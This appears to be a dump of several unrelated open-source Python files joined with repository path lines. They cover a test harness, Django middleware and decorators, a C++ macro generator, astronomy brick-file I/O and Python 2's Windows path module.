def runcmd_unchecked(self, cmd, skip_on_noexec = 0):
"""Invoke a command; return (exitcode, stdout, stderr)"""
waitstatus, stdout, stderr = self.run_captured(cmd)
assert not os.WIFSIGNALED(waitstatus), \
("%s terminated with signal %d" % (`cmd`, os.WTERMSIG(waitstatus)))
rc = os.WEXITSTATUS(waitstatus)
self.test_log = self.test_log + ("""Run command: %s
Wait status: %#x (exit code %d, signal %d)
stdout:
%s
stderr:
%s""" % (cmd, waitstatus, os.WEXITSTATUS(waitstatus), os.WTERMSIG(waitstatus),
stdout, stderr))
if skip_on_noexec and rc == 127:
# Either we could not execute the command or the command
# returned exit code 127. According to system(3) we can't
# tell the difference.
raise NotRunError, "could not execute %s" % `cmd`
return rc, stdout, stderr
def explain_failure(self, exc_info = None):
print "test_log:"
print self.test_log
def log(self, msg):
"""Log a message to the test log. This message is displayed if
the test fails, or when the runtests function is invoked with
the verbose option."""
self.test_log = self.test_log + msg + "\n"
class NotRunError(Exception):
"""Raised if a test must be skipped because of missing resources"""
def __init__(self, value = None):
self.value = value
def _report_error(case, debugger):
"""Ask the test case to explain failure, and optionally run a debugger
Input:
case TestCase instance
debugger if true, a debugger function to be applied to the traceback
"""
ex = sys.exc_info()
print "-----------------------------------------------------------------"
if ex:
import traceback
traceback.print_exc(file=sys.stdout)
case.explain_failure()
print "-----------------------------------------------------------------"
if debugger:
tb = ex[2]
debugger(tb)
def runtest(testcase_class, ret, verbose=0, debugger=None, subtest=0):
"""Instantiate test class, run it, and catch and report exceptions.
Inputs:
testcase_class a class derived from TestCase
ret return status, an integer
verbose an integer (used as boolean)
debugger debugger object to be applied to errors
subtest an integer (used as boolean)
Returns:
a new return status
Raises:
KeyboardInterrupt
If subtest is true, then the ordinary information about the
test progress is not printed.
"""
if not subtest:
print "%-30s" % _test_name(testcase_class),
def failure_print(message):
print message
else:
def failure_print(message):
print '[%s %s]' % (_test_name(testcase_class), message)
# flush now so that long running tests are easier to follow
sys.stdout.flush()
obj = None
try:
try:
# run test and sometimes show result
obj = testcase_class()
obj.setup()
obj.runtest()
if not subtest:
print "OK"
except KeyboardInterrupt:
failure_print("INTERRUPT")
if obj:
_report_error(obj, debugger)
raise
except NotRunError, msg:
failure_print("NOTRUN, %s" % msg.value)
except:
failure_print("FAIL")
if obj:
_report_error(obj, debugger)
return 1
finally:
if obj:
ret = obj.apply_cleanups(debugger) or ret
# Display log file if we're verbose
if ret == 0 and verbose:
obj.explain_failure()
return ret
def runtests(test_list, verbose = 0, debugger = None):
"""Run a series of tests.
Inputs:
test_list sequence of TestCase classes
verbose print more information as testing proceeds
debugger debugger object to be applied to errors
Returns:
unix return code: 0 for success, 1 for failures, 2 for test failure
"""
import traceback
ret = 0
for testcase_class in test_list:
try:
ret = runtest(testcase_class, ret, verbose=verbose,
debugger=debugger)
except KeyboardInterrupt:
ret = 2
break
return ret
def _test_name(test_class):
"""Return a human-readable name for a test class.
"""
try:
return test_class.__name__
except:
return `test_class`
def print_help():
"""Help for people running tests"""
print """%s: software test suite based on ComfyChair
usage:
To run all tests, just run this program. To run particular tests,
list them on the command line.
options:
--help show usage message
--list list available tests
--verbose, -v show more information while running tests
--post-mortem, -p enter Python debugger on error
""" % sys.argv[0]
def print_list(test_list):
"""Show list of available tests"""
for test_class in test_list:
print " %s" % _test_name(test_class)
def main(tests, extra_tests=[]):
"""Main entry point for test suites based on ComfyChair.
inputs:
tests Sequence of TestCase subclasses to be run by default.
extra_tests Sequence of TestCase subclasses that are available but
not run by default.
Test suites should contain this boilerplate:
if __name__ == '__main__':
comfychair.main(tests)
This function handles standard options such as --help and --list, and
by default runs all tests in the suggested order.
Calls sys.exit() on completion.
"""
import getopt, sys
opt_verbose = 0
debugger = None
opts, args = getopt.getopt(sys.argv[1:], 'pv',
['help', 'list', 'verbose', 'post-mortem'])
for opt, opt_arg in opts:
if opt == '--help':
print_help()
return
elif opt == '--list':
print_list(tests + extra_tests)
return
elif opt == '--verbose' or opt == '-v':
opt_verbose = 1
elif opt == '--post-mortem' or opt == '-p':
import pdb
debugger = pdb.post_mortem
if args:
all_tests = tests + extra_tests
by_name = {}
for t in all_tests:
by_name[_test_name(t)] = t
which_tests = []
for name in args:
which_tests.append(by_name[name])
else:
which_tests = tests
sys.exit(runtests(which_tests, verbose=opt_verbose,
debugger=debugger))
if __name__ == '__main__':
print __doc__
|
noamelf/Open-Knesset
|
refs/heads/master
|
hashnav/__init__.py
|
14
|
from functools import wraps, update_wrapper
from base import View
from list import ListView
from detail import DetailView
def method_decorator(decorator):
"""
Converts a view function decorator into a method decorator.
the special thing about view decorators is that they expect
'request' to be their first argument.
Example:
class MyView(View):
allowed_methods = ['GET','POST'],
@method_decorator(login_required)
def POST(*arg, **kwargs):
...
"""
def _dec(func):
def _wrapper(self, *args, **kwargs):
def bound_func(request, *args2, **kwargs2):
return func(self, *args2, **kwargs2)
# bound_func has the signature that 'decorator' expects i.e. no
# 'self' argument, but it is a closure over self so it can call
# 'func' correctly.
return decorator(bound_func)(self.request, *args, **kwargs)
return wraps(func)(_wrapper)
update_wrapper(_dec, decorator)
# Change the name to aid debugging.
_dec.__name__ = 'method_dec(%s)' % decorator.__name__
return _dec
|
Mozta/pagina-diagnostijuego
|
refs/heads/master
|
venv/lib/python2.7/site-packages/django/middleware/locale.py
|
32
|
"This is the locale selecting middleware that will look at accept headers"
from django.conf import settings
from django.conf.urls.i18n import is_language_prefix_patterns_used
from django.http import HttpResponseRedirect
from django.urls import get_script_prefix, is_valid_path
from django.utils import translation
from django.utils.cache import patch_vary_headers
from django.utils.deprecation import MiddlewareMixin
class LocaleMiddleware(MiddlewareMixin):
"""
This is a very simple middleware that parses a request
and decides what translation object to install in the current
thread context. This allows pages to be dynamically
translated to the language the user desires (if the language
is available, of course).
"""
response_redirect_class = HttpResponseRedirect
def process_request(self, request):
urlconf = getattr(request, 'urlconf', settings.ROOT_URLCONF)
i18n_patterns_used, prefixed_default_language = is_language_prefix_patterns_used(urlconf)
language = translation.get_language_from_request(request, check_path=i18n_patterns_used)
language_from_path = translation.get_language_from_path(request.path_info)
if not language_from_path and i18n_patterns_used and not prefixed_default_language:
language = settings.LANGUAGE_CODE
translation.activate(language)
request.LANGUAGE_CODE = translation.get_language()
def process_response(self, request, response):
language = translation.get_language()
language_from_path = translation.get_language_from_path(request.path_info)
urlconf = getattr(request, 'urlconf', settings.ROOT_URLCONF)
i18n_patterns_used, prefixed_default_language = is_language_prefix_patterns_used(urlconf)
if response.status_code == 404 and not language_from_path and i18n_patterns_used:
language_path = '/%s%s' % (language, request.path_info)
path_valid = is_valid_path(language_path, urlconf)
path_needs_slash = (
not path_valid and (
settings.APPEND_SLASH and not language_path.endswith('/') and
is_valid_path('%s/' % language_path, urlconf)
)
)
if path_valid or path_needs_slash:
script_prefix = get_script_prefix()
# Insert language after the script prefix and before the
# rest of the URL
language_url = request.get_full_path(force_append_slash=path_needs_slash).replace(
script_prefix,
'%s%s/' % (script_prefix, language),
1
)
return self.response_redirect_class(language_url)
if not (i18n_patterns_used and language_from_path):
patch_vary_headers(response, ('Accept-Language',))
if 'Content-Language' not in response:
response['Content-Language'] = language
return response
|
hthompson6/contrail-controller
|
refs/heads/master
|
src/base/factory_macros.py
|
15
|
#!/usr/bin/python
#
# Copyright (c) 2013 Juniper Networks, Inc. All rights reserved.
#
def generate_header(file):
header = """//
// Generated by base/factory_macros.py
//
"""
file.write(header)
macro_tmpl = """#define FACTORY_TYPE_N%(cardinality)d(_Module, _T%(comma)s%(argument_types)s)
public:
template <class U>
static typename boost::enable_if<boost::is_same<U, _T>, void>::type
Register(boost::function<_T *(%(argument_types)s)> function) {
_Module *obj = GetInstance();
obj->make_ ## _T ## _ = function;
}
template <class U>
static typename boost::enable_if<boost::is_same<U, _T>, _T *>::type
Create(%(argument_decl)s) {
_Module *obj = GetInstance();
return obj->make_ ## _T ## _(%(call_arguments)s);
}
private:
boost::function<_T *(%(argument_types)s)> make_ ## _T ##_
"""
def generate_n(file, cardinality):
call_arguments = ''
decl = ''
types = ''
for n in range(cardinality):
if n:
call_arguments += ', '
decl += ', '
types += ', '
call_arguments += 'a%d' % n
decl += 'A%d a%d' % (n, n)
types += 'A%d' % n
if cardinality:
comma = ', '
else:
comma = ''
macro = macro_tmpl % {
'argument_decl': decl,
'argument_types': types,
'call_arguments': call_arguments,
'cardinality': cardinality,
'comma': comma,
}
file.write(macro.replace('\n', '\\\n'))
file.write('\n')
def generate(filename):
file = open(filename, 'w')
generate_header(file)
for n in range(8):
generate_n(file, n)
file.close()
if __name__ == '__main__':
generate("src/base/factory_macros.h")
|
samuelshaner/openmc
|
refs/heads/develop
|
tests/test_trigger_batch_interval/test_trigger_batch_interval.py
|
8
|
#!/usr/bin/env python
import os
import sys
sys.path.insert(0, os.pardir)
from testing_harness import TestHarness
if __name__ == '__main__':
harness = TestHarness('statepoint.15.*', True)
harness.main()
|
gdhungana/desispec
|
refs/heads/master
|
py/desispec/io/brick.py
|
2
|
"""
desispec.io.brick
=================
I/O routines for working with per-brick files.
See ``doc/DESI_SPECTRO_REDUX/SPECPROD/bricks/BRICKID/*-BRICKID.rst`` in desidatamodel
for a description of the relevant data models.
See :doc:`coadd` and `DESI-doc-1056 <https://desi.lbl.gov/DocDB/cgi-bin/private/ShowDocument?docid=1056>`_
for general information about the coaddition dataflow and algorithms.
"""
import os
import os.path
import re
import warnings
import numpy as np
import astropy.io.fits
from desiutil.depend import add_dependencies
import desispec.io.util
#- For backwards compatibility, derive brickname from filename
def _parse_brick_filename(filepath):
"""return (channel, brickname) from /path/to/brick-[brz]-{brickname}.fits
"""
filename = os.path.basename(filepath)
warnings.warn('Deriving channel and brickname from filename {} instead of contents'.format(filename))
m = re.match('brick-([brz])-(\w+).fits', filename)
if m is None:
raise ValueError('Unable to derive channel and brickname from '+filename)
else:
return m.groups() #- (channel, brickname)
class BrickBase(object):
"""Represents objects in a single brick and possibly also a single band b,r,z.
The constructor will open an existing file and create a new file and parent
directory if necessary. The :meth:`close` method must be called for any updates
or new data to be recorded. Successful completion of the constructor does not
guarantee that :meth:`close` will succeed.
Args:
path(str): Path to the brick file to open.
mode(str): File access mode to use. Should normally be 'readonly' or 'update'. Use 'update' to create a new file and its parent directory if necessary.
header: An optional header specification used to create a new file. See :func:`desispec.io.util.fitsheader` for details on allowed values.
Raises:
RuntimeError: Invalid mode requested.
IOError: Unable to open existing file in 'readonly' mode.
OSError: Unable to create a new parent directory in 'update' mode.
"""
def __init__(self,path,mode = 'readonly',header = None):
if mode not in ('readonly','update'):
raise RuntimeError('Invalid mode %r' % mode)
self.path = path
self.mode = mode
# Create a new file if necessary.
if self.mode == 'update' and not os.path.exists(self.path):
# BRICKNAM must be in header if creating the file for the first time
if header is None or 'BRICKNAM' not in header:
raise ValueError('header must have BRICKNAM when creating new brick file')
self.brickname = header['BRICKNAM']
if 'CHANNEL' in header:
self.channel = header['CHANNEL']
else:
self.channel = 'brz' #- could be any spectrograph channel
# Create the parent directory, if necessary.
head,tail = os.path.split(self.path)
if not os.path.exists(head):
os.makedirs(head)
# Create empty HDUs. It would be good to refactor io.frame to avoid any duplication here.
hdr = desispec.io.util.fitsheader(header)
add_dependencies(hdr)
hdr['EXTNAME'] = ('FLUX', 'no dimension')
hdu0 = astropy.io.fits.PrimaryHDU(header = hdr)
hdr['EXTNAME'] = ('IVAR', 'no dimension')
hdu1 = astropy.io.fits.ImageHDU(header = hdr)
hdr['EXTNAME'] = ('WAVELENGTH', '[Angstroms]')
hdu2 = astropy.io.fits.ImageHDU(header = hdr)
hdr['EXTNAME'] = ('RESOLUTION', 'no dimension')
hdu3 = astropy.io.fits.ImageHDU(header = hdr)
# Create an HDU4 using the columns from fibermap with a few extras added.
columns = desispec.io.fibermap.fibermap_columns[:]
columns.extend([
('NIGHT','i4'),
('EXPID','i4'),
('INDEX','i4'),
])
data = np.empty(shape = (0,),dtype = columns)
hdr = desispec.io.util.fitsheader(header)
#- ignore incorrect and harmless fits TDIM7 warning for
#- FILTER column that is a 2D array of strings
with warnings.catch_warnings():
warnings.simplefilter('ignore')
hdu4 = astropy.io.fits.BinTableHDU(data=data, header=hdr, name='FIBERMAP')
# Add comments for fibermap columns.
num_fibermap_columns = len(desispec.io.fibermap.fibermap_comments)
for i in range(1,1+num_fibermap_columns):
key = 'TTYPE%d' % i
name = hdu4.header[key]
comment = desispec.io.fibermap.fibermap_comments[name]
hdu4.header[key] = (name,comment)
# Add comments for our additional columns.
hdu4.header['TTYPE%d' % (1+num_fibermap_columns)] = ('NIGHT','Night of exposure YYYYMMDD')
hdu4.header['TTYPE%d' % (2+num_fibermap_columns)] = ('EXPID','Exposure ID')
hdu4.header['TTYPE%d' % (3+num_fibermap_columns)] = ('INDEX','Index of this object in other HDUs')
self.hdu_list = astropy.io.fits.HDUList([hdu0,hdu1,hdu2,hdu3,hdu4])
else:
self.hdu_list = astropy.io.fits.open(path,mode = self.mode)
try:
self.brickname = self.hdu_list[0].header['BRICKNAM']
self.channel = self.hdu_list[0].header['CHANNEL']
except KeyError:
self.channel, self.brickname = _parse_brick_filename(path)
def add_objects(self,flux,ivar,wave,resolution):
"""Add a list of objects to this brick file from the same night and exposure.
Args:
flux(numpy.ndarray): Array of (nobj,nwave) flux values for nobj objects tabulated at nwave wavelengths.
ivar(numpy.ndarray): Array of (nobj,nwave) inverse-variance values.
wave(numpy.ndarray): Array of (nwave,) wavelength values in Angstroms. All objects are assumed to use the same wavelength grid.
resolution(numpy.ndarray): Array of (nobj,nres,nwave) resolution matrix elements.
Raises:
RuntimeError: Can only add objects in update mode.
"""
if self.mode != 'update':
raise RuntimeError('Can only add objects in update mode.')
# Concatenate the new per-object image HDU data or use it to initialize the HDU.
# HDU2 contains the wavelength grid shared by all objects so we only add it once.
if self.hdu_list[0].data is not None:
self.hdu_list[0].data = np.concatenate((self.hdu_list[0].data,flux,))
self.hdu_list[1].data = np.concatenate((self.hdu_list[1].data,ivar,))
assert np.array_equal(self.hdu_list[2].data,wave),'Wavelength arrays do not match.'
self.hdu_list[3].data = np.concatenate((self.hdu_list[3].data,resolution,))
else:
self.hdu_list[0].data = flux
self.hdu_list[1].data = ivar
self.hdu_list[2].data = wave
self.hdu_list[3].data = resolution
def get_wavelength_grid(self):
"""Return the wavelength grid used in this brick file.
"""
return self.hdu_list[2].data
def get_target(self,target_id):
"""Get the spectra and info for one target ID.
Args:
target_id(int): Target ID number to lookup.
Returns:
tuple: Tuple of numpy arrays (flux,ivar,resolution,info) of data associated
with this target ID. The flux,ivar,resolution arrays will have one entry
for each spectrum and the info array will have one entry per exposure.
The returned arrays are slices into the FITS file HDU data arrays, so this
call is relatively cheap (and any changes will be saved to the file if it
was opened in update mode.)
"""
exposures = (self.hdu_list[4].data['TARGETID'] == target_id)
index_list = np.unique(self.hdu_list[4].data['INDEX'][exposures])
return (self.hdu_list[0].data[index_list],self.hdu_list[1].data[index_list],
self.hdu_list[3].data[index_list],self.hdu_list[4].data[exposures])
def get_target_ids(self):
"""Return set of unique target IDs in this brick.
"""
return list(set(self.hdu_list[4].data['TARGETID']))
def get_num_spectra(self):
"""Get the number of spectra contained in this brick file.
Returns:
int: Number of objects contained in this brick file.
"""
return len(self.hdu_list[0].data)
def get_num_targets(self):
"""Get the number of distinct targets with at least one spectrum in this brick file.
Returns:
int: Number of unique targets represented with spectra in this brick file.
"""
return len(np.unique(self.hdu_list[4].data['TARGETID']))
def close(self):
"""Write any updates and close the brick file.
"""
if self.mode == 'update':
self.hdu_list.writeto(self.path,clobber = True)
self.hdu_list.close()
class Brick(BrickBase):
"""Represents the combined cframe exposures in a single brick and band.
See :class:`BrickBase` for constructor info.
"""
def __init__(self,path,mode = 'readonly',header = None):
BrickBase.__init__(self,path,mode,header)
def add_objects(self,flux,ivar,wave,resolution,object_data,night,expid):
"""Add a list of objects to this brick file from the same night and exposure.
Args:
flux(numpy.ndarray): Array of (nobj,nwave) flux values for nobj objects tabulated at nwave wavelengths.
ivar(numpy.ndarray): Array of (nobj,nwave) inverse-variance values.
wave(numpy.ndarray): Array of (nwave,) wavelength values in Angstroms. All objects are assumed to use the same wavelength grid.
resolution(numpy.ndarray): Array of (nobj,nres,nwave) resolution matrix elements.
object_data(numpy.ndarray): Record array of fibermap rows for the objects to add.
night(str): Date string for the night these objects were observed in the format YYYYMMDD.
expid(int): Exposure number for these objects.
Raises:
RuntimeError: Can only add objects in update mode.
"""
BrickBase.add_objects(self,flux,ivar,wave,resolution)
# Augment object_data with constant NIGHT and EXPID columns.
augmented_data = np.empty(shape = object_data.shape,dtype = self.hdu_list[4].data.dtype)
for column_def in desispec.io.fibermap.fibermap_columns:
name = column_def[0]
# Special handling for the fibermap FILTER array, which is not output correctly
# by astropy.io.fits so we convert it to a comma-separated list.
if name == 'FILTER' and augmented_data[name].shape != object_data[name].shape:
for i,filters in enumerate(object_data[name]):
augmented_data[name][i] = ','.join(filters)
else:
augmented_data[name] = object_data[name]
augmented_data['NIGHT'] = int(night)
augmented_data['EXPID'] = expid
begin_index = len(self.hdu_list[4].data)
end_index = begin_index + len(flux)
augmented_data['INDEX'] = np.arange(begin_index,end_index,dtype=int)
# Always concatenate to our table since a new file will be created with a zero-length table.
self.hdu_list[4].data = np.concatenate((self.hdu_list[4].data,augmented_data,))
class CoAddedBrick(BrickBase):
"""Represents the co-added exposures in a single brick and, possibly, a single band.
See :class:`BrickBase` for constructor info.
"""
def __init__(self,path,mode = 'readonly',header = None):
BrickBase.__init__(self,path,mode,header)
|
proxysh/Safejumper-for-Desktop
|
refs/heads/master
|
buildlinux/env32/local/lib/python2.7/ntpath.py
|
16
|
# Module 'ntpath' -- common operations on WinNT/Win95 pathnames
"""Common pathname manipulations, WindowsNT/95 version.
Instead of importing this module directly, import os and refer to this
module as os.path.
"""
import os
import sys
import stat
import genericpath
import warnings
from genericpath import *
__all__ = ["normcase","isabs","join","splitdrive","split","splitext",
"basename","dirname","commonprefix","getsize","getmtime",
"getatime","getctime", "islink","exists","lexists","isdir","isfile",
"ismount","walk","expanduser","expandvars","normpath","abspath",
"splitunc","curdir","pardir","sep","pathsep","defpath","altsep",
"extsep","devnull","realpath","supports_unicode_filenames","relpath"]
# strings representing various path-related bits and pieces
curdir = '.'
pardir = '..'
extsep = '.'
sep = '\\'
pathsep = ';'
altsep = '/'
defpath = '.;C:\\bin'
if 'ce' in sys.builtin_module_names:
defpath = '\\Windows'
elif 'os2' in sys.builtin_module_names:
# OS/2 w/ VACPP
altsep = '/'
devnull = 'nul'
# Normalize the case of a pathname and map slashes to backslashes.
# Other normalizations (such as optimizing '../' away) are not done
# (this is done by normpath).
def normcase(s):
"""Normalize case of pathname.
Makes all characters lowercase and all slashes into backslashes."""
return s.replace("/", "\\").lower()
# Return whether a path is absolute.
# Trivial in Posix, harder on the Mac or MS-DOS.
# For DOS it is absolute if it starts with a slash or backslash (current
# volume), or if a pathname after the volume letter and colon / UNC resource
# starts with a slash or backslash.
def isabs(s):
"""Test whether a path is absolute"""
s = splitdrive(s)[1]
return s != '' and s[:1] in '/\\'
# Join two (or more) paths.
def join(path, *paths):
"""Join two or more pathname components, inserting "\\" as needed."""
result_drive, result_path = splitdrive(path)
for p in paths:
p_drive, p_path = splitdrive(p)
if p_path and p_path[0] in '\\/':
# Second path is absolute
if p_drive or not result_drive:
result_drive = p_drive
result_path = p_path
continue
elif p_drive and p_drive != result_drive:
if p_drive.lower() != result_drive.lower():
# Different drives => ignore the first path entirely
result_drive = p_drive
result_path = p_path
continue
# Same drive in different case
result_drive = p_drive
# Second path is relative to the first
if result_path and result_path[-1] not in '\\/':
result_path = result_path + '\\'
result_path = result_path + p_path
return result_drive + result_path
# Split a path in a drive specification (a drive letter followed by a
# colon) and the path specification.
# It is always true that drivespec + pathspec == p
def splitdrive(p):
"""Split a pathname into drive and path specifiers. Returns a 2-tuple
"(drive,path)"; either part may be empty"""
if p[1:2] == ':':
return p[0:2], p[2:]
return '', p
# Parse UNC paths
def splitunc(p):
"""Split a pathname into UNC mount point and relative path specifiers.
Return a 2-tuple (unc, rest); either part may be empty.
If unc is not empty, it has the form '//host/mount' (or similar
using backslashes). unc+rest is always the input path.
Paths containing drive letters never have an UNC part.
"""
if p[1:2] == ':':
return '', p # Drive letter present
firstTwo = p[0:2]
if firstTwo == '//' or firstTwo == '\\\\':
# is a UNC path:
# vvvvvvvvvvvvvvvvvvvv equivalent to drive letter
# \\machine\mountpoint\directories...
# directory ^^^^^^^^^^^^^^^
normp = p.replace('\\', '/')
index = normp.find('/', 2)
if index <= 2:
return '', p
index2 = normp.find('/', index + 1)
# a UNC path can't have two slashes in a row
# (after the initial two)
if index2 == index + 1:
return '', p
if index2 == -1:
index2 = len(p)
return p[:index2], p[index2:]
return '', p
# Split a path in head (everything up to the last '/') and tail (the
# rest). After the trailing '/' is stripped, the invariant
# join(head, tail) == p holds.
# The resulting head won't end in '/' unless it is the root.
def split(p):
"""Split a pathname.
Return tuple (head, tail) where tail is everything after the final slash.
Either part may be empty."""
d, p = splitdrive(p)
# set i to index beyond p's last slash
i = len(p)
while i and p[i-1] not in '/\\':
i = i - 1
head, tail = p[:i], p[i:] # now tail has no slashes
# remove trailing slashes from head, unless it's all slashes
head2 = head
while head2 and head2[-1] in '/\\':
head2 = head2[:-1]
head = head2 or head
return d + head, tail
# Split a path in root and extension.
# The extension is everything starting at the last dot in the last
# pathname component; the root is everything before that.
# It is always true that root + ext == p.
def splitext(p):
return genericpath._splitext(p, sep, altsep, extsep)
splitext.__doc__ = genericpath._splitext.__doc__
# Return the tail (basename) part of a path.
def basename(p):
"""Returns the final component of a pathname"""
return split(p)[1]
# Return the head (dirname) part of a path.
def dirname(p):
"""Returns the directory component of a pathname"""
return split(p)[0]
# Is a path a symbolic link?
# This will always return false on systems where posix.lstat doesn't exist.
def islink(path):
"""Test for symbolic link.
On WindowsNT/95 and OS/2 always returns false
"""
return False
# alias exists to lexists
lexists = exists
# Is a path a mount point? Either a root (with or without drive letter)
# or an UNC path with at most a / or \ after the mount point.
def ismount(path):
"""Test whether a path is a mount point (defined as root of drive)"""
unc, rest = splitunc(path)
if unc:
return rest in ("", "/", "\\")
p = splitdrive(path)[1]
return len(p) == 1 and p[0] in '/\\'
# Directory tree walk.
# For each directory under top (including top itself, but excluding
# '.' and '..'), func(arg, dirname, filenames) is called, where
# dirname is the name of the directory and filenames is the list
# of files (and subdirectories etc.) in the directory.
# The func may modify the filenames list, to implement a filter,
# or to impose a different order of visiting.
def walk(top, func, arg):
"""Directory tree walk with callback function.
For each directory in the directory tree rooted at top (including top
itself, but excluding '.' and '..'), call func(arg, dirname, fnames).
dirname is the name of the directory, and fnames a list of the names of
the files and subdirectories in dirname (excluding '.' and '..'). func
may modify the fnames list in-place (e.g. via del or slice assignment),
and walk will only recurse into the subdirectories whose names remain in
fnames; this can be used to implement a filter, or to impose a specific
order of visiting. No semantics are defined for, or required of, arg,
beyond that arg is always passed to func. It can be used, e.g., to pass
a filename pattern, or a mutable object designed to accumulate
statistics. Passing None for arg is common."""
warnings.warnpy3k("In 3.x, os.path.walk is removed in favor of os.walk.",
stacklevel=2)
try:
names = os.listdir(top)
except os.error:
return
func(arg, top, names)
for name in names:
name = join(top, name)
if isdir(name):
walk(name, func, arg)
# Expand paths beginning with '~' or '~user'.
# '~' means $HOME; '~user' means that user's home directory.
# If the path doesn't begin with '~', or if the user or $HOME is unknown,
# the path is returned unchanged (leaving error reporting to whatever
# function is called with the expanded path as argument).
# See also module 'glob' for expansion of *, ? and [...] in pathnames.
# (A function should also be defined to do full *sh-style environment
# variable expansion.)
def expanduser(path):
"""Expand ~ and ~user constructs.
If user or $HOME is unknown, do nothing."""
if path[:1] != '~':
return path
i, n = 1, len(path)
while i < n and path[i] not in '/\\':
i = i + 1
if 'HOME' in os.environ:
userhome = os.environ['HOME']
elif 'USERPROFILE' in os.environ:
userhome = os.environ['USERPROFILE']
elif not 'HOMEPATH' in os.environ:
return path
else:
try:
drive = os.environ['HOMEDRIVE']
except KeyError:
drive = ''
userhome = join(drive, os.environ['HOMEPATH'])
if i != 1: #~user
userhome = join(dirname(userhome), path[1:i])
return userhome + path[i:]
# Expand paths containing shell variable substitutions.
# The following rules apply:
# - no expansion within single quotes
# - '$$' is translated into '$'
# - '%%' is translated into '%' if '%%' are not seen in %var1%%var2%
# - ${varname} is accepted.
# - $varname is accepted.
# - %varname% is accepted.
# - varnames can be made out of letters, digits and the characters '_-'
# (though is not verified in the ${varname} and %varname% cases)
# XXX With COMMAND.COM you can use any characters in a variable name,
# XXX except '^|<>='.
def expandvars(path):
"""Expand shell variables of the forms $var, ${var} and %var%.
Unknown variables are left unchanged."""
if '$' not in path and '%' not in path:
return path
import string
varchars = string.ascii_letters + string.digits + '_-'
if isinstance(path, unicode):
encoding = sys.getfilesystemencoding()
def getenv(var):
return os.environ[var.encode(encoding)].decode(encoding)
else:
def getenv(var):
return os.environ[var]
res = ''
index = 0
pathlen = len(path)
while index < pathlen:
c = path[index]
if c == '\'': # no expansion within single quotes
path = path[index + 1:]
pathlen = len(path)
try:
index = path.index('\'')
res = res + '\'' + path[:index + 1]
except ValueError:
res = res + path
index = pathlen - 1
elif c == '%': # variable or '%'
if path[index + 1:index + 2] == '%':
res = res + c
index = index + 1
else:
path = path[index+1:]
pathlen = len(path)
try:
index = path.index('%')
except ValueError:
res = res + '%' + path
index = pathlen - 1
else:
var = path[:index]
try:
res = res + getenv(var)
except KeyError:
res = res + '%' + var + '%'
elif c == '$': # variable or '$$'
if path[index + 1:index + 2] == '$':
res = res + c
index = index + 1
elif path[index + 1:index + 2] == '{':
path = path[index+2:]
pathlen = len(path)
try:
index = path.index('}')
var = path[:index]
try:
res = res + getenv(var)
except KeyError:
res = res + '${' + var + '}'
except ValueError:
res = res + '${' + path
index = pathlen - 1
else:
var = ''
index = index + 1
c = path[index:index + 1]
while c != '' and c in varchars:
var = var + c
index = index + 1
c = path[index:index + 1]
try:
res = res + getenv(var)
except KeyError:
res = res + '$' + var
if c != '':
index = index - 1
else:
res = res + c
index = index + 1
return res
# Normalize a path, e.g. A//B, A/./B and A/foo/../B all become A\B.
# Previously, this function also truncated pathnames to 8+3 format,
# but as this module is called "ntpath", that's obviously wrong!
def normpath(path):
"""Normalize path, eliminating double slashes, etc."""
# Preserve unicode (if path is unicode)
backslash, dot = (u'\\', u'.') if isinstance(path, unicode) else ('\\', '.')
if path.startswith(('\\\\.\\', '\\\\?\\')):
# in the case of paths with these prefixes:
# \\.\ -> device names
# \\?\ -> literal paths
# do not do any normalization, but return the path unchanged
return path
path = path.replace("/", "\\")
prefix, path = splitdrive(path)
# We need to be careful here. If the prefix is empty, and the path starts
# with a backslash, it could either be an absolute path on the current
# drive (\dir1\dir2\file) or a UNC filename (\\server\mount\dir1\file). It
# is therefore imperative NOT to collapse multiple backslashes blindly in
# that case.
# The code below preserves multiple backslashes when there is no drive
# letter. This means that the invalid filename \\\a\b is preserved
# unchanged, where a\\\b is normalised to a\b. It's not clear that there
# is any better behaviour for such edge cases.
if prefix == '':
# No drive letter - preserve initial backslashes
while path[:1] == "\\":
prefix = prefix + backslash
path = path[1:]
else:
# We have a drive letter - collapse initial backslashes
if path.startswith("\\"):
prefix = prefix + backslash
path = path.lstrip("\\")
comps = path.split("\\")
i = 0
while i < len(comps):
if comps[i] in ('.', ''):
del comps[i]
elif comps[i] == '..':
if i > 0 and comps[i-1] != '..':
del comps[i-1:i+1]
i -= 1
elif i == 0 and prefix.endswith("\\"):
del comps[i]
else:
i += 1
else:
i += 1
# If the path is now empty, substitute '.'
if not prefix and not comps:
comps.append(dot)
return prefix + backslash.join(comps)
# Return an absolute path.
try:
from nt import _getfullpathname
except ImportError: # not running on Windows - mock up something sensible
def abspath(path):
"""Return the absolute version of a path."""
if not isabs(path):
if isinstance(path, unicode):
cwd = os.getcwdu()
else:
cwd = os.getcwd()
path = join(cwd, path)
return normpath(path)
else: # use native Windows method on Windows
def abspath(path):
"""Return the absolute version of a path."""
if path: # Empty path must return current working directory.
try:
path = _getfullpathname(path)
except WindowsError:
pass # Bad path - return unchanged.
elif isinstance(path, unicode):
path = os.getcwdu()
else:
path = os.getcwd()
return normpath(path)
# realpath is a no-op on systems without islink support
realpath = abspath
# Win9x family and earlier have no Unicode filename support.
supports_unicode_filenames = (hasattr(sys, "getwindowsversion") and
sys.getwindowsversion()[3] >= 2)
def _abspath_split(path):
abs = abspath(normpath(path))
prefix, rest = splitunc(abs)
is_unc = bool(prefix)
if not is_unc:
prefix, rest = splitdrive(abs)
return is_unc, prefix, [x for x in rest.split(sep) if x]
def relpath(path, start=curdir):
"""Return a relative version of a path"""
if not path:
raise ValueError("no path specified")
start_is_unc, start_prefix, start_list = _abspath_split(start)
path_is_unc, path_prefix, path_list = _abspath_split(path)
if path_is_unc ^ start_is_unc:
raise ValueError("Cannot mix UNC and non-UNC paths (%s and %s)"
% (path, start))
if path_prefix.lower() != start_prefix.lower():
if path_is_unc:
raise ValueError("path is on UNC root %s, start on UNC root %s"
% (path_prefix, start_prefix))
else:
raise ValueError("path is on drive %s, start on drive %s"
% (path_prefix, start_prefix))
# Work out how much of the filepath is shared by start and path.
i = 0
for e1, e2 in zip(start_list, path_list):
if e1.lower() != e2.lower():
break
i += 1
rel_list = [pardir] * (len(start_list)-i) + path_list[i:]
if not rel_list:
return curdir
return join(*rel_list)
try:
# The genericpath.isdir implementation uses os.stat and checks the mode
# attribute to tell whether or not the path is a directory.
# This is overkill on Windows - just pass the path to GetFileAttributes
# and check the attribute from there.
from nt import _isdir as isdir
except ImportError:
# Use genericpath.isdir as imported above.
pass
|
gis4dis/poster
|
refs/heads/master
|
apps/importing/admin.py
|
